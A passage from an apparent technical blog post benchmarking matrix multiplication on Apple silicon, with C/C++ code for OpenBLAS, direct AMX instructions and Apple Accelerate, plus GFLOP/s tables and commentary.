        <span class="hljs-function"><span class="hljs-keyword">if</span> <span class="hljs-title">constexpr</span> <span class="hljs-params">(<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">float</span>&gt;)</span> </span>{
            cblas_sgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0f</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0f</span>, c.data(), n);
        } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">constexpr</span> (<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">double</span>&gt;) {
            cblas_dgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0</span>, c.data(), n);
        }
    }

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">init_matrices</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-built_in">std</span>::fill(a.begin(), a.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(b.begin(), b.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(c.begin(), c.end(), T(<span class="hljs-number">0</span>));
    }
};
</code></pre>
<div class="hn-table">
<table>
<thead>
<tr>
<td>N</td><td>GFLOP/s</td><td>mean(rt)</td><td>min(rt)</td><td>max(rt)</td></tr>
</thead>
<tbody>
<tr>
<td>64</td><td>79.643</td><td>0.00001</td><td>0.00001</td><td>0.00001</td></tr>
<tr>
<td>128</td><td>63.995</td><td>0.00040</td><td>0.00007</td><td>0.00599</td></tr>
<tr>
<td>256</td><td>212.650</td><td>0.00087</td><td>0.00016</td><td>0.00705</td></tr>
<tr>
<td>512</td><td>371.408</td><td>0.00087</td><td>0.00072</td><td>0.00130</td></tr>
<tr>
<td>1024</td><td>423.668</td><td>0.00759</td><td>0.00507</td><td>0.02126</td></tr>
<tr>
<td>2048</td><td>448.801</td><td>0.04301</td><td>0.03828</td><td>0.04739</td></tr>
<tr>
<td>4096</td><td>570.152</td><td>0.27678</td><td>0.24106</td><td>0.32018</td></tr>
<tr>
<td>8192</td><td>574.347</td><td>2.22609</td><td>1.91437</td><td>2.91120</td></tr>
</tbody>
</table>
</div><p>OpenBLAS demonstrates varying performance characteristics across different matrix dimensions. For compact matrices, specifically at N=64, OpenBLAS achieves 79.6 GFLOP/s. This performance gradually improves as matrix sizes increase, reaching 371 GFLOP/s at N=512. The library's response times for these smaller matrices, while relatively brief, show a noticeable increase starting from N=128. As matrix dimensions grow, OpenBLAS exhibits improved performance metrics. At N=1024, for instance, OpenBLAS reaches 423 GFLOP/s, marking a substantial improvement from smaller sizes.</p>
<p>The performance characteristics of OpenBLAS undergo further changes as matrix sizes grow beyond N=1024. In this range, the library exhibits longer response times, with this trend becoming particularly pronounced for large matrices such as N=4096 and N=8192. At these dimensions, OpenBLAS's mean response times increase significantly. The largest tested matrix size, N=8192, sees OpenBLAS achieving 574 GFLOP/s, but comes at the cost of increased computational time, with mean response times surpassing 2.2 seconds.</p>
<h3 id="heading-rawdogging-apple-amx">Rawdogging Apple AMX</h3>
<p>Now to something more exotic, we interact with Apple AMX directly through a header file built by <a target="_blank" href="https://gist.github.com/dougallj/7cba721da1a94da725ee37c1e9cd1f21">Dougall Johnson</a>. We gonna have to call alot of instructions relating to AMX from this wrapper, but</p>
<p>We begin by making a microkernel with a 32x32 tile of the output matrix C, leveraging the AMX's ability to work with large data blocks efficiently. This loop loads four 16x32 blocks of C into the Z registers. The <code>i &lt;&lt; 2</code> in the offset argument selects different groups of Z registers for each block, effectively utilizing the full 64 Z registers available in the AMX.</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
    amx_ldz((<span class="hljs-keyword">uint8_t</span> *)(C + i * <span class="hljs-number">16</span> * ldc), i &lt;&lt; <span class="hljs-number">2</span>, <span class="hljs-number">1</span>);
}
</code></pre>
<p>The main computation loop iterates over the K dimension, loading a column of A and a row of B in each iteration. These instructions load 32 elements from A into a Y register and 32 elements from B into an X register. The AMX can then perform an outer product of these vectors, accumulating the result into the Z registers.</p>
<pre><code class="lang-c">amx_ldy((<span class="hljs-keyword">uint8_t</span> *)(A + k), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);
amx_ldx((<span class="hljs-keyword">uint8_t</span> *)(B + k * ldb), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);
</code></pre>
<p>Next we create a nested loop performs four FMA32 operations, each computing a 16x16 block of the 32x32 output tile. The arguments to <code>amx_fma32</code> select different portions of the X and Y registers and different groups of Z registers for each operation.</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
        amx_fma32(j, i, i * <span class="hljs-number">2</span> + j, <span class="hljs-number">0</span>);
    }
}
</code></pre>
<p>To maximize performance, we can further create matrix packing strategies to rearrange the input matrices into a more cache-friendly layout. We can do this by packing 32-element column segments of A into contiguous memory, improving spatial locality and reducing cache misses during the micro-kernel execution.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">pack_matrix_a</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *dest, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *src, <span class="hljs-keyword">uint64_t</span> M, <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> lda)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> i = <span class="hljs-number">0</span>; i &lt; M; i += <span class="hljs-number">32</span>) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> ii = <span class="hljs-number">0</span>; ii &lt; <span class="hljs-number">32</span> &amp;&amp; i + ii &lt; M; ii++) {
                dest[k * <span class="hljs-number">32</span> + ii] = src[(i + ii) * lda + k];
            }
        }
        dest += K * <span class="hljs-number">32</span>;
    }
}
</code></pre>
<p>The main <code>amx_sgemm</code> function orchestrates the overall computation, employing a cache blocking strategy to optimize performance. It defines block sizes MC, KC, and NC (all set to 384 in this implementation) to ensure that the working set fits within the processor's cache hierarchy. The function allocates aligned memory for packed versions of A and B, ensuring optimal memory access patterns for the AMX instructions.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">amx_sgemm</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *A, <span class="hljs-keyword">float</span> *B, <span class="hljs-keyword">float</span> *C, <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> size)</span> </span>{
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> M = size, N = size, K = size;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> MC = <span class="hljs-number">384</span>, KC = <span class="hljs-number">384</span>, NC = <span class="hljs-number">384</span>;  <span class="hljs-comment">// Cache blocking parameters</span>

    <span class="hljs-keyword">float</span> *packed_A = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, MC * KC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));
    <span class="hljs-keyword">float</span> *packed_B = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, KC * NC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));
</code></pre>
<p>The computation is then structured as nested loops over blocks of the matrices, with the innermost loop invoking the micro-kernel.</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> mc = <span class="hljs-number">0</span>; mc &lt; M; mc += MC) {
    <span class="hljs-keyword">uint64_t</span> mc_end = MIN(mc + MC, M);
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> nc = <span class="hljs-number">0</span>; nc &lt; N; nc += NC) {
        <span class="hljs-keyword">uint64_t</span> nc_end = MIN(nc + NC, N);

        <span class="hljs-comment">// Pack B panel</span>
        pack_matrix_b(packed_B, B + nc, K, nc_end - nc, N);

        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> kc = <span class="hljs-number">0</span>; kc &lt; K; kc += KC) {
            <span class="hljs-keyword">uint64_t</span> kc_end = MIN(kc + KC, K);

            <span class="hljs-comment">// Pack A panel</span>
            pack_matrix_a(packed_A, A + mc * K + kc, mc_end - mc, kc_end - kc, K);

            <span class="hljs-comment">// Micro-kernel calls</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> m = <span class="hljs-number">0</span>; m &lt; mc_end - mc; m += <span class="hljs-number">32</span>) {
                <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> n = <span class="hljs-number">0</span>; n &lt; nc_end - nc; n += <span class="hljs-number">32</span>) {
                    amx_gemm_micro_kernel(
                        packed_A + m * (kc_end - kc),
                        packed_B + n * (kc_end - kc),
                        C + (mc + m) * N + (nc + n),
                        kc_end - kc, <span class="hljs-number">32</span>, <span class="hljs-number">32</span>, N
                    );
                }
            }
        }
    }
}
</code></pre>
<p>Finally we arrive at the final implementation.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> once</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdint.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"amx.h"</span></span>

<span class="hljs-comment">// AMX wrapper functions</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_ldz</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_LDZ(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">6</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_stz</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_STZ(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">6</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_ldx</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_LDX(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_ldy</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_LDY(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_stx</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_STX(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_sty</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_STY(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_fma32</span><span class="hljs-params">(<span class="hljs-keyword">uint64_t</span> xoffset, <span class="hljs-keyword">uint64_t</span> yoffset, <span class="hljs-keyword">uint64_t</span> zoffset, <span class="hljs-keyword">uint64_t</span> zignore)</span>
</span>{
    AMX_FMA32((yoffset &lt;&lt; <span class="hljs-number">6</span>) |
              (xoffset &lt;&lt; <span class="hljs-number">6</span> &lt;&lt; <span class="hljs-number">10</span>) |
              (zoffset &lt;&lt; <span class="hljs-number">20</span>) |
              (zignore &lt;&lt; <span class="hljs-number">27</span>));
}

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MIN(a,b) ((a) &lt; (b) ? (a) : (b))</span>

<span class="hljs-comment">// Micro-kernel for 32x32 tiles</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_gemm_micro_kernel</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *A, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *B, <span class="hljs-keyword">float</span> *C, 
                                  <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> lda, <span class="hljs-keyword">uint64_t</span> ldb, <span class="hljs-keyword">uint64_t</span> ldc)</span> </span>{
    <span class="hljs-comment">// Load C tile</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
        amx_ldz((<span class="hljs-keyword">uint8_t</span> *)(C + i * <span class="hljs-number">16</span> * ldc), i &lt;&lt; <span class="hljs-number">2</span>, <span class="hljs-number">1</span>);
    }

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
        <span class="hljs-comment">// Load A column (32x1)</span>
        amx_ldy((<span class="hljs-keyword">uint8_t</span> *)(A + k), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);

        <span class="hljs-comment">// Load B row (1x32)</span>
        amx_ldx((<span class="hljs-keyword">uint8_t</span> *)(B + k * ldb), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);

        <span class="hljs-comment">// Perform FMA for 32x32 tile</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
                amx_fma32(j, i, i * <span class="hljs-number">2</span> + j, <span class="hljs-number">0</span>);
            }
        }
    }

    <span class="hljs-comment">// Store C tile</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
        amx_stz((<span class="hljs-keyword">uint8_t</span> *)(C + i * <span class="hljs-number">16</span> * ldc), i &lt;&lt; <span class="hljs-number">2</span>, <span class="hljs-number">1</span>);
    }
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">pack_matrix_a</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *dest, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *src, <span class="hljs-keyword">uint64_t</span> M, <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> lda)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> i = <span class="hljs-number">0</span>; i &lt; M; i += <span class="hljs-number">32</span>) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> ii = <span class="hljs-number">0</span>; ii &lt; <span class="hljs-number">32</span> &amp;&amp; i + ii &lt; M; ii++) {
                dest[k * <span class="hljs-number">32</span> + ii] = src[(i + ii) * lda + k];
            }
        }
        dest += K * <span class="hljs-number">32</span>;
    }
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">pack_matrix_b</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *dest, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *src, <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> N, <span class="hljs-keyword">uint64_t</span> ldb)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> j = <span class="hljs-number">0</span>; j &lt; N; j += <span class="hljs-number">32</span>) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> jj = <span class="hljs-number">0</span>; jj &lt; <span class="hljs-number">32</span> &amp;&amp; j + jj &lt; N; jj++) {
                dest[k * <span class="hljs-number">32</span> + jj] = src[k * ldb + (j + jj)];
            }
        }
        dest += K * <span class="hljs-number">32</span>;
    }
}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">amx_sgemm</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *A, <span class="hljs-keyword">float</span> *B, <span class="hljs-keyword">float</span> *C, <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> size)</span> </span>{
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> M = size, N = size, K = size;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> MC = <span class="hljs-number">384</span>, KC = <span class="hljs-number">384</span>, NC = <span class="hljs-number">384</span>;  <span class="hljs-comment">// Cache blocking parameters</span>

    <span class="hljs-comment">// Allocate packed buffers</span>
    <span class="hljs-keyword">float</span> *packed_A = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, MC * KC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));
    <span class="hljs-keyword">float</span> *packed_B = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, KC * NC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));

    <span class="hljs-keyword">if</span> (!packed_A || !packed_B) {
        <span class="hljs-built_in">free</span>(packed_A);
        <span class="hljs-built_in">free</span>(packed_B);
        <span class="hljs-keyword">return</span>;
    }

    AMX_START();

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> mc = <span class="hljs-number">0</span>; mc &lt; M; mc += MC) {
        <span class="hljs-keyword">uint64_t</span> mc_end = MIN(mc + MC, M);
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> nc = <span class="hljs-number">0</span>; nc &lt; N; nc += NC) {
            <span class="hljs-keyword">uint64_t</span> nc_end = MIN(nc + NC, N);

            <span class="hljs-comment">// Pack B panel</span>
            pack_matrix_b(packed_B, B + nc, K, nc_end - nc, N);

            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> kc = <span class="hljs-number">0</span>; kc &lt; K; kc += KC) {
                <span class="hljs-keyword">uint64_t</span> kc_end = MIN(kc + KC, K);

                <span class="hljs-comment">// Pack A panel</span>
                pack_matrix_a(packed_A, A + mc * K + kc, mc_end - mc, kc_end - kc, K);

                <span class="hljs-comment">// Micro-kernel calls</span>
                <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> m = <span class="hljs-number">0</span>; m &lt; mc_end - mc; m += <span class="hljs-number">32</span>) {
                    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> n = <span class="hljs-number">0</span>; n &lt; nc_end - nc; n += <span class="hljs-number">32</span>) {
                        amx_gemm_micro_kernel(
                            packed_A + m * (kc_end - kc),
                            packed_B + n * (kc_end - kc),
                            C + (mc + m) * N + (nc + n),
                            kc_end - kc, <span class="hljs-number">32</span>, <span class="hljs-number">32</span>, N
                        );
                    }
                }
            }
        }
    }

    AMX_STOP();

    <span class="hljs-built_in">free</span>(packed_A);
    <span class="hljs-built_in">free</span>(packed_B);
}
</code></pre>
<div class="hn-table">
<table>
<thead>
<tr>
<td>N</td><td>GFLOP/s</td><td>mean(rt)</td><td>min(rt)</td><td>max(rt)</td></tr>
</thead>
<tbody>
<tr>
<td>64</td><td>636.304</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>128</td><td>1006.633</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>256</td><td>1182.901</td><td>0.00003</td><td>0.00003</td><td>0.00003</td></tr>
<tr>
<td>512</td><td>2178.736</td><td>0.00014</td><td>0.00012</td><td>0.00024</td></tr>
<tr>
<td>1024</td><td>2365.431</td><td>0.00090</td><td>0.00083</td><td>0.00108</td></tr>
<tr>
<td>2048</td><td>1737.817</td><td>0.01026</td><td>0.00990</td><td>0.01087</td></tr>
<tr>
<td>4096</td><td>1654.705</td><td>0.08087</td><td>0.07996</td><td>0.08243</td></tr>
<tr>
<td>8192</td><td>1566.844</td><td>0.71723</td><td>0.68770</td><td>0.72344</td></tr>
</tbody>
</table>
</div><p>At the smallest matrix size (N = 64), the GFLOP/s is 636.304, but the response times (mean, min, max) are effectively zero, indicating that the operations are completed extremely quickly, likely within the hardware’s noise level or precision limits of measurement. As the matrix size increases, the GFLOP/s gradually increases, reaching a peak of 2365.431 GFLOP/s at N = 1024. This shows that the AMX hardware is optimized to handle matrix sizes around 1024, providing the highest throughput at this size. However, as the matrix size continues to increase beyond 1024, the GFLOP/s begins to decline, likely due to limitations in memory bandwidth or cache usage that cannot keep pace with the increased demand for data.</p>
<p>The response times also tell a story of how performance scales with matrix size. For small matrices, the response time is negligible, but it becomes progressively more significant as matrix size increases. For example, at N = 2048, the mean response time jumps to 0.01026 seconds, and at N = 4096, the response time escalates further to 0.08087 seconds. The trend continues, with N = 8192 showing the highest response time at 0.71723 seconds.</p>
<h3 id="heading-interacting-with-apple-accelerate">Interacting with Apple Accelerate</h3>
<p>Apple’s Accelerate is a library for high-performance but energy-efficient computation on the CPU by leveraging its vector-processing capability. The library contains functions for :</p>
<ul>
<li><p>Image processing, such as converting between formats and image manipulation (<strong>vImage)</strong></p>
</li>
<li><p>Low-level routines for accelerating common linear algebra operations such as matricies and vectors (<strong>BLAS)</strong></p>
</li>
<li><p>Specific type of neural networks trained to be capable to quantify uncertainty associated with the underlying processes (<strong>BNNS)</strong></p>
</li>
<li><p>Mathematical operations important in image processing or any signal really including audio (<strong>vDSP)</strong></p>
</li>
<li><p>Routines for solving higher level linear algebra functions like linear equations or eigenvalue problems (<strong>LAPACK)</strong></p>
</li>
</ul>
<p>In more common HPC circles, this would be equivalent to something like cuBLAS or cuLAPACK from NVIDIA. We can use this library by using <code>&lt;Accelerate/Accelerate.h&gt;</code></p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> once</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;Accelerate/Accelerate.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;vector&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;algorithm&gt;</span></span>

<span class="hljs-keyword">template</span> &lt;<span class="hljs-keyword">typename</span> T&gt;
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">AccelerateGEMM</span> :</span> <span class="hljs-keyword">public</span> GEMM&lt;T&gt;
{
<span class="hljs-keyword">private</span>:
    <span class="hljs-keyword">size_t</span> n;
    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">vector</span>&lt;T&gt; a, b, c;

<span class="hljs-keyword">public</span>:
    <span class="hljs-function"><span class="hljs-keyword">explicit</span> <span class="hljs-title">AccelerateGEMM</span><span class="hljs-params">(<span class="hljs-keyword">size_t</span> n)</span> : <span class="hljs-title">n</span><span class="hljs-params">(n)</span>, <span class="hljs-title">a</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">b</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">c</span><span class="hljs-params">(n * n)</span> </span>{}

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-function"><span class="hljs-keyword">if</span> <span class="hljs-title">constexpr</span> <span class="hljs-params">(<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">float</span>&gt;)</span> </span>{
            cblas_sgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0f</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0f</span>, c.data(), n);
        } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">constexpr</span> (<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">double</span>&gt;) {
            cblas_dgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0</span>, c.data(), n);
        }
    }

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">init_matrices</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-built_in">std</span>::fill(a.begin(), a.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(b.begin(), b.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(c.begin(), c.end(), T(<span class="hljs-number">0</span>));
    }
};
</code></pre>
<div class="hn-table">
<table>
<thead>
<tr>
<td>N</td><td>GFLOP/s</td><td>mean(rt)</td><td>min(rt)</td><td>max(rt)</td></tr>
</thead>
<tbody>
<tr>
<td>64</td><td>699.051</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>128</td><td>1037.937</td><td>0.00000</td><td>0.00000</td><td>0.00000</td></tr>
<tr>
<td>256</td><td>1233.211</td><td>0.00003</td><td>0.00003</td><td>0.00003</td></tr>
<tr>
<td>512</td><td>2274.877</td><td>0.00014</td><td>0.00012</td><td>0.00023</td></tr>
<tr>
